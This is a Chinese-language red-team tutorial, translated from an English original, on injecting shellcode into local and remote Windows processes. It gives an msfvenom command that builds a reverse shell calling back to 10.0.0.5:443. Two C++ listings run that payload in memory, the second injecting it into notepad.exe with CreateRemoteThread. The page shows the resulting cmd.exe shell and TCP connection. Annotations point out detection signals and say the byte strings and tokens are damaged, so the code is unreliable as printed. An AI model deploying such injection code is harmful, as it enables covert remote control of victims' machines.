【翻譯】創建線程shellcode注入
- 2019 年 10 月 6 日
- 筆記
本文作者:Ovpirit_Three(Ms08067紅隊小組成員)
注入shellcode進入一個本地進程
這次實現探索了將shellcode注入進程內存並執行它的一些經典方法
一、在本地進程中執行 shellcode
一個簡單的測試,演示如何在 C++ 程序中直接執行 shellcode
為反向 shell 生成 shellcode:
命令如下:
msfvenom -p windows/x64/shell_reverse_tcpLHOST=10.0.0.5LPORT=443-f c -b x00x0ax0d
c++代碼注入和調用shellcode:
inject-local-process.cpp
// Purpose: run a byte blob inside the *current* process — allocate RWX memory, copy the bytes in,
// and call the buffer as if it were a function.
// NOTE(review): this listing was damaged in extraction. The `\x` escape prefixes of the byte-string
// are gone (so the literal as printed is ASCII text, not the intended bytes) and several tokens are
// fused (`Unsignedchar`, `intmain`, `sizeofshellcode`, `return0`). It is reproduced as found and is
// not compilable as shown.
#include"stdafx.h"
#include"Windows.h"
// The surrounding text describes this blob as the msfvenom reverse shell to 10.0.0.5:443 from the
// command above; its bytes are left exactly as printed.
intmain() {
    Unsignedchar shellcode[]=
    "x48x31xc9x48x81xe9xc6xffxffxffx48x8dx05xefxff"
    "xffxffx48xbbx1dxbexa2x7bx2bx90xe1xecx48x31x58"
    "x27x48x2dxf8xffxffxffxe2xf4xe1xf6x21x9fxdbx78"
    "x21xecx1dxbexe3x2ax6axc0xb3xbdx4bxf6x93xa9x4e"
    "xd8x6axbex7dxf6x29x29x33xd8x6axbex3dxf6x29x09"
    "x7bxd8xeex5bx57xf4xefx4axe2xd8xd0x2cxb1x82xc3"
    "x07x29xbcxc1xadxdcx77xafx3ax2ax51x03x01x4fxff"
    "xf3x33xa0xc2xc1x67x5fx82xeax7axfbx1bx61x64x1d"
    "xbexa2x33xaex50x95x8bx55xbfx72x2bxa0xd8xf9xa8"
    "x96xfex82x32x2ax40x02xbax55x41x6bx3axa0xa4x69"
    "xa4x1cx68xefx4axe2xd8xd0x2cxb1xffx63xb2x26xd1"
    "xe0x2dx25x5exd7x8ax67x93xadxc8x15xfbx9bxaax5e"
    "x48xb9xa8x96xfex86x32x2ax40x87xadx96xb2xeax3f"
    "xa0xd0xfdxa5x1cx6exe3xf0x2fx18xa9xedxcdxffxfa"
    "x3ax73xcexb8xb6x5cxe6xe3x22x6axcaxa9x6fxf1x9e"
    "xe3x29xd4x70xb9xadx44xe4xeaxf0x39x79xb6x13xe2"
    "x41xffx32x95xe7x92xdex42x8dx90x7bx2bxd1xb7xa5"
    "x94x58xeaxfaxc7x30xe0xecx1dxf7x2bx9ex62x2cxe3"
    "xecx1cx05xa8x7bx2bx95xa0xb8x54x37x46x37xa2x61"
    "xa0x56x51xc9x84x7cxd4x45xadx65xf7xd6xa3x7ax2b"
    "x90xb8xadxa7x97x22x10x2bx6fx34xbcx4dxf3x93xb2"
    "x66xa1x21xa4xe2x7exeaxf2xe9xd8x1ex2cx55x37x63"
    "x3ax91x7axeex33xfdx41x77x33xa2x57x8bxfcx5cxe6"
    "xeexf2xc9xd8x68x15x5cx04x3bxdex5fxf1x1ex39x55"
    "x3fx66x3bx29x90xe1xa5xa5xddxcfx1fx2bx90xe1xec"
    "x1dxffxf2x3ax7bxd8x68x0ex4axe9xf5x36x1ax50x8b"
    "xe1x44xffxf2x99xd7xf6x26xa8x39xeaxa3x7ax63x1d"
    "xa5xc8x05x78xa2x13x63x19x07xbax4dxffxf2x3ax7b"
    "xd1xb1xa5xe2x7exe3x2bx62x6fx29xa1x94x7fxeexf2"
    "xeaxd1x5bx95xd1x81x24x84xfexd8xd0x3ex55x41x68"
    "xf0x25xd1x5bxe4x9axa3xc2x84xfex2bx11x59xbfxe8"
    "xe3xc1x8dx05x5cx71xe2x6bxeaxf8xefxb8xddxeax61"
    "xb4x22x80xcbxe5xe4x57x5axadxd0x14x41x90xb8xad"
    "x94x64x5dxaex2bx90xe1xec";
    // A committed private region that is writable *and* executable, backed by no image on disk.
    // This RWX allocation is the first half of the pattern memory scanners and EDR commonly flag.
    // The result is not checked: VirtualAlloc returns NULL on failure and the memcpy below would fault.
    void*exec =VirtualAlloc(0,sizeofshellcode,MEM_COMMIT,PAGE_EXECUTE_READWRITE);
    memcpy(exec,shellcode,sizeofshellcode);
    // Control transfer into non-image memory — the second half of the signal (an RWX private page
    // that is then executed). The region is never released afterwards.
    ((void(*)())exec)();
    return0;
}
在編譯之前,出於好奇,讓我們看看在反彙編器中生成的shellcode二進制代碼,這樣我們就可以大致了解我們的c++代碼是如何翻譯成x64的機器碼的:
同樣出於好奇,我們想看看被注入的 shellcode 在目標進程中是什麼樣子,以及它實際位於何處。生成一個 32 位的 shellcode 二進制(msfvenom -p windows/shell_reverse_tcpLHOST=10.0.0.5 LPORT=443 -f c -b x00x0ax0d),可以看到這段 shellcode 恰好位於主線程的棧中
回到 x64 shellcode——編譯並執行這個二進制文件,它給了我們預期的反向 shell
二、在遠程進程中執行shellcode
下面的代碼會把 shellcode 注入到 PID 為 5428 的 notepad.exe 進程中,它將向攻擊者發起一個反向 shell 連接
inject-remote-process.cpp
#include"stdafx.h"
#include"Windows.h"
// Purpose: copy the byte blob into *another* process (the text uses notepad.exe, PID 5428) and
// start a thread in that process at the blob's address.
// NOTE(review): damaged in extraction like the listing above — the `\x` escape prefixes are missing
// and tokens are fused (`intmain`, `intargc`, `unsignedcharshellcode`, `sizeofshellcode`, `return0`).
// Reproduced as found; not compilable as shown.
intmain(intargc,char*argv[]) {
    unsignedcharshellcode[]=
    "x48x31xc9x48x81xe9xc6xffxffxffx48x8dx05xefxff"
    "xffxffx48xbbx1dxbexa2x7bx2bx90xe1xecx48x31x58"
    "x27x48x2dxf8xffxffxffxe2xf4xe1xf6x21x9fxdbx78"
    "x21xecx1dxbexe3x2ax6axc0xb3xbdx4bxf6x93xa9x4e"
    "xd8x6axbex7dxf6x29x29x33xd8x6axbex3dxf6x29x09"
    "x7bxd8xeex5bx57xf4xefx4axe2xd8xd0x2cxb1x82xc3"
    "x07x29xbcxc1xadxdcx77xafx3ax2ax51x03x01x4fxff"
    "xf3x33xa0xc2xc1x67x5fx82xeax7axfbx1bx61x64x1d"
    "xbexa2x33xaex50x95x8bx55xbfx72x2bxa0xd8xf9xa8"
    "x96xfex82x32x2ax40x02xbax55x41x6bx3axa0xa4x69"
    "xa4x1cx68xefx4axe2xd8xd0x2cxb1xffx63xb2x26xd1"
    "xe0x2dx25x5exd7x8ax67x93xadxc8x15xfbx9bxaax5e"
    "x48xb9xa8x96xfex86x32x2ax40x87xadx96xb2xeax3f"
    "xa0xd0xfdxa5x1cx6exe3xf0x2fx18xa9xedxcdxffxfa"
    "x3ax73xcexb8xb6x5cxe6xe3x22x6axcaxa9x6fxf1x9e"
    "xe3x29xd4x70xb9xadx44xe4xeaxf0x39x79xb6x13xe2"
    "x41xffx32x95xe7x92xdex42x8dx90x7bx2bxd1xb7xa5"
    "x94x58xeaxfaxc7x30xe0xecx1dxf7x2bx9ex62x2cxe3"
    "xecx1cx05xa8x7bx2bx95xa0xb8x54x37x46x37xa2x61"
    "xa0x56x51xc9x84x7cxd4x45xadx65xf7xd6xa3x7ax2b"
    "x90xb8xadxa7x97x22x10x2bx6fx34xbcx4dxf3x93xb2"
    "x66xa1x21xa4xe2x7exeaxf2xe9xd8x1ex2cx55x37x63"
    "x3ax91x7axeex33xfdx41x77x33xa2x57x8bxfcx5cxe6"
    "xeexf2xc9xd8x68x15x5cx04x3bxdex5fxf1x1ex39x55"
    "x3fx66x3bx29x90xe1xa5xa5xddxcfx1fx2bx90xe1xec"
    "x1dxffxf2x3ax7bxd8x68x0ex4axe9xf5x36x1ax50x8b"
    "xe1x44xffxf2x99xd7xf6x26xa8x39xeaxa3x7ax63x1d"
    "xa5xc8x05x78xa2x13x63x19x07xbax4dxffxf2x3ax7b"
    "xd1xb1xa5xe2x7exe3x2bx62x6fx29xa1x94x7fxeexf2"
    "xeaxd1x5bx95xd1x81x24x84xfexd8xd0x3ex55x41x68"
    "xf0x25xd1x5bxe4x9axa3xc2x84xfex2bx11x59xbfxe8"
    "xe3xc1x8dx05x5cx71xe2x6bxeaxf8xefxb8xddxeax61"
    "xb4x22x80xcbxe5xe4x57x5axadxd0x14x41x90xb8xad"
    "x94x64x5dxaex2bx90xe1xec";
    HANDLE processHandle;
    HANDLE remoteThread;
    PVOID remoteBuffer;
    // argv[1] is read without checking argc; atoi(NULL) is undefined behaviour when no PID is given.
    printf("Injectingto PID: %i",atoi(argv[1]));
    // Opens the target with the full access mask rather than the minimum the later calls need.
    // Cross-process handle opens with broad rights are a standard audit point in process-access
    // telemetry. A NULL handle (open failed) is not checked and would be passed on to every call below.
    processHandle =OpenProcess(PROCESS_ALL_ACCESS,FALSE,DWORD(atoi(argv[1])));
    // RWX memory allocated *in the target* — the first step of the classic injection sequence
    // VirtualAllocEx(RWX) -> WriteProcessMemory -> CreateRemoteThread. None of the three results is
    // checked; a NULL remoteBuffer would be written to and then used as a thread start address.
    remoteBuffer =VirtualAllocEx(processHandle,NULL,sizeofshellcode,(MEM_RESERVE
    |MEM_COMMIT),PAGE_EXECUTE_READWRITE);
    WriteProcessMemory(processHandle,remoteBuffer,shellcode,sizeofshellcode,NULL);
    // A thread created in a foreign process whose start address lies in private, image-less memory.
    // This is the primary signal defenders key on: remote-thread creation events plus an unbacked
    // start address, followed (per the text) by notepad loading ws2_32.dll and spawning cmd.exe.
    remoteThread =CreateRemoteThread(processHandle,NULL,0,(LPTHREAD_START_ROUTINE)remoteBuffer,NULL,0,NULL);
    // remoteThread is never closed (handle leak); only the process handle is released.
    CloseHandle(processHandle);
    return0;
}
在將 shellcode 注入 notepad 之前,可以看到它並沒有任何 TCP 連接
現在:一旦代碼編譯並執行,監視API調用的系統就會發現notepad正在做一些它本不應該做的事情——生成cmd.exe並啟動TCP連接:
在 Process Explorer 中檢查記事本,同樣可以看到一個已建立的 TCP 連接,以及作為子進程啟動的 cmd.exe
注意,notepad 加載了 ws2_32.dll 模塊;正常情況下這不應該發生,因為該模塊負責 socket 管理